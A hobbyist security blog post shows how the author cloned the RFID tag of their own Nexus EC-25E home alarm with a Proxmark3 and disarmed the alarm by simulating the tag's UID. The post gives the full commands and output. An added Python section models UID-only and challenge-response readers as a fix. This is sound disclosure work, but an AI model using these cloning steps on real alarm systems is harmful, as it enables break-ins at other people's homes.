Bought an alarm system a while ago, and thought I would play with it a bit, to see how bad it actually is. Let's say, so far, I'm not impressed.
If you want to try this out for yourself, you would need the alarm system and a Proxmark3. If you've got that covered, dig in for some alarm system fun :)

Okay, first: what system is it?

It's a Nexus EC-25E, like this one here: https://www.nexuscctv.dk/wifi-3g-alarmstyreenhed.html. Just for laughs, I got a couple of wireless remotes and a wireless keypad with RFID to go with it, just to have something to play with. So far, I've played around with the RFID tags, and here are the results.

Fire up a PM3, and let's start the hunt.

hf search
 🕓  Searching for LTO-CM tag...              
[!] ⚠️  No known/supported 13.56 MHz tags found
[usb] pm3 --> hf search
 🕚  Searching for LTO-CM tag...              
 🕐  Searching for ISO14443-A tag...          
[+]  UID: 5F F8 3C 3D 
[+] ATQA: 00 04
[+]  SAK: 08 [2]
[+] Possible types:
[+]    MIFARE Classic 1K
[=] proprietary non iso14443-4 card found, RATS not supported
[+] Magic capabilities : Gen 1a
[#] 1 static nonce 01200145
[+] Static nonce: yes
[#] Auth error

So we got a card / tag. It looks like it's a Mifare Classic 1K tag. Okay. Now, I'm lazy, so why don't we try this:

hf mf autopwn

If that worked, you should now have an emulator dump file, ending in .eml. Now, let's see if we can simulate the tag back to the alarm system, using the Proxmark3. We do that by loading the dump into the simulator and verifying that it's there. First we load it:

hf mf eload -f hf-mf-5FFXXX-dump.eml

Let's see if we got it in the simulator:

pm3 --> hf mf eview
[=] downloading emulator memory

[=] ----+-------------------------------------------------+-----------------
[=] blk | data                                            | ascii
[=] ----+-------------------------------------------------+-----------------
[=]   0 | 5F F8 3C 3D A6 08 04 00 01 6F 01 6D 45 68 F8 1D | _.<=.....o.mEh..
[=]   1 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 
[=]   2 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 
[=]   3 | FF FF FF FF FF FF 08 77 8F 00 FF FF FF FF FF FF | .......w........
[=]   4 | 68 61 6E 64 6C 65 00 00 00 00 00 00 00 00 00 00 | handle.......... 
[=]   5 | 4E 6F 45 78 65 63 75 74 65 00 00 00 00 00 00 00 | NoExecute....... 
[=]   6 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 

So, this requires a little bit of explaining, I guess.

If you look at the ASCII column, it says "handle" and "NoExecute". That's because this is a test tag, used to play around with electronic dog tags and smartphones. But since the Nexus seems to use only the UID, the rest of the content doesn't matter.

Notice block 0: we got a UID. So let's try and run the simulator with the content that's loaded. But before we do that, arm the alarm system, and check with the app that it really is armed.

Now, to run the simulator with the content from the dump file, we need this command:

hf mf sim --1k
[=] MIFARE 1K |  UID  N/A
[=] Options [ numreads: 0, flags: 272 (0x110) ]

[#] Enforcing Mifare 1K ATQA/SAK
[#] 4B UID: 5ff83c3d
[#] ATQA  : 00 04
[#] SAK   : 08
[usb] pm3 --> hf mf sim --1k --interactive

You can run it with "hf mf sim --1k", but I like to run it in interactive mode, so the prompt keeps running until I break it. Either works out fine, so try them both. Now, present the Proxmark to the wireless keypad for the alarm system, and if things worked out, it should switch to disarmed mode, and the app should say so.

So, did we learn anything? Yep: don't leave your tags unattended, and don't let friends / strangers borrow them, not even for five seconds without you watching their every move :)

As far as RFID goes, this system simply isn't good enough, since it just checks the UID and nothing else. And what's worse: when you use the keypad normally, you have to press "disarm + pincode + #" to shut off the alarm. That's not true when using the tag. Simply present the tag to the keypad, and it shuts off the alarm, no pincode needed.

I know what you're gonna say: that it requires the thief to get hold of a tag and copy it. You're right, it does. But with some knowledge, some social engineering, and a long range reader, that should be possible. All of this would be IMPOSSIBLE if the vendor required the system to check for other parameters in the tag itself, not just rely on the UID alone, and used good encryption on the tag itself.
I know, my bad. It is after all only a 300 USD system, so what did I expect? :)
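The weakness described above (a keypad that disarms on a UID match alone) and the fix the post asks for are easiest to see side by side. The Python below is an added example, not code from this post or from the Nexus or Proxmark3 projects. It parses the post's own "hf mf eview" block lines, checks the block-0 layout of a 4-byte-UID Mifare Classic (UID, BCC, SAK, ATQA with the low byte first), and then models a UID-only reader next to a reader that demands a keyed challenge-response. The reader and tag classes, the panel master key, the key-diversification scheme and the nonces are all constructed for the illustration. It also makes one caveat explicit: a secret stored in a readable block would be copied along with the rest of the dump, and Mifare Classic's own sector keys are recoverable (that is what "hf mf autopwn" did above), so the stronger policy only helps on a credential whose key never leaves the chip and whose authentication is not broken.

```python
"""Added example: UID-only acceptance versus keyed challenge-response.
Not from the original post or the Nexus / Proxmark3 projects; the reader and
tag classes, master key and nonces are constructed for the illustration."""
import hashlib
import hmac
import os
import re

# Block lines copied from the post's `hf mf eview` output (sample input).
EVIEW_DUMP = """\
[=]   0 | 5F F8 3C 3D A6 08 04 00 01 6F 01 6D 45 68 F8 1D | _.<=.....o.mEh..
[=]   1 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
[=]   3 | FF FF FF FF FF FF 08 77 8F 00 FF FF FF FF FF FF | .......w........
[=]   4 | 68 61 6E 64 6C 65 00 00 00 00 00 00 00 00 00 00 | handle..........
"""

BLOCK_RE = re.compile(
    r"\[=\]\s+(\d+)\s+\|\s+((?:[0-9A-Fa-f]{2}\s+){15}[0-9A-Fa-f]{2})\s+\|")


def parse_eview(text):
    """Return {block_number: 16 bytes} for every data line of an eview dump."""
    blocks = {}
    for line in text.splitlines():
        m = BLOCK_RE.match(line)
        if m:
            blocks[int(m.group(1))] = bytes.fromhex(m.group(2).replace(" ", ""))
    return blocks


def manufacturer_block(block0):
    """Split block 0 of a 4-byte-UID Mifare Classic: UID, BCC, SAK, ATQA (low byte first)."""
    uid, bcc, sak, atqa = block0[:4], block0[4], block0[5], block0[6:8]
    calc = 0
    for b in uid:
        calc ^= b  # BCC is the XOR of the four UID bytes
    return {"uid": uid, "bcc_ok": calc == bcc, "sak": sak, "atqa": atqa}


class UidOnlyReader:
    """Policy the post observes: any tag presenting an enrolled UID disarms."""
    def __init__(self, enrolled_uids):
        self.enrolled = set(enrolled_uids)

    def admit(self, tag):
        return tag.uid in self.enrolled


class ChallengeResponseReader:
    """Policy that also demands proof of a per-tag secret the reader never reads out."""
    def __init__(self, master_key, enrolled_uids):
        self.master_key = master_key
        self.enrolled = set(enrolled_uids)

    def tag_key(self, uid):
        # Constructed key diversification: per-tag key = HMAC(master, uid); master stays in the panel.
        return hmac.new(self.master_key, uid, hashlib.sha256).digest()

    def admit(self, tag, nonce=None):
        if tag.uid not in self.enrolled:
            return False
        nonce = os.urandom(16) if nonce is None else nonce  # fresh per attempt
        expected = hmac.new(self.tag_key(tag.uid), nonce, hashlib.sha256).digest()
        response = tag.respond(nonce)
        return response is not None and hmac.compare_digest(expected, response)


class GenuineTag:
    """Holds the diversified key in memory the reader cannot dump, and answers challenges."""
    def __init__(self, uid, key):
        self.uid, self._key = uid, key

    def respond(self, nonce):
        return hmac.new(self._key, nonce, hashlib.sha256).digest()


class ClonedTag:
    """A dump-and-emulate clone: it has the UID and every readable block but no hidden key,
    so the best it can do is replay a response it saw in an earlier genuine session."""
    def __init__(self, blocks, observed=None):
        self.uid = blocks[0][:4]
        self.observed = observed or {}  # nonce -> response captured earlier

    def respond(self, nonce):
        return self.observed.get(nonce)


def demo():
    blocks = parse_eview(EVIEW_DUMP)
    info = manufacturer_block(blocks[0])
    master = b"constructed-panel-master-key"  # constructed secret, never on the tag
    enrolled = {info["uid"]}
    genuine = GenuineTag(info["uid"], hmac.new(master, info["uid"], hashlib.sha256).digest())
    clone = ClonedTag(blocks)
    old_nonce = bytes(16)  # constructed fixed nonce, stands in for a reader that reuses nonces
    replayer = ClonedTag(blocks, {old_nonce: genuine.respond(old_nonce)})
    uid_reader = UidOnlyReader(enrolled)
    cr_reader = ChallengeResponseReader(master, enrolled)
    return {
        "uid_hex": info["uid"].hex(),
        "bcc_ok": info["bcc_ok"],
        "uid_only_admits_clone": uid_reader.admit(clone),
        "cr_admits_genuine": cr_reader.admit(genuine),
        "cr_admits_clone": cr_reader.admit(clone),
        "cr_admits_replay_fresh_nonce": cr_reader.admit(replayer),
        "cr_admits_replay_reused_nonce": cr_reader.admit(replayer, nonce=old_nonce),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Run as-is and the UID-only reader accepts the clone built from the dump, while the challenge-response reader accepts only the genuine tag. The last two results are the design note: the clone's replay fails against a fresh random nonce but succeeds when the reader reuses a nonce, so the per-attempt randomness is as much a part of the mitigation as the secret key.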

As Always, Much Happy Hacking
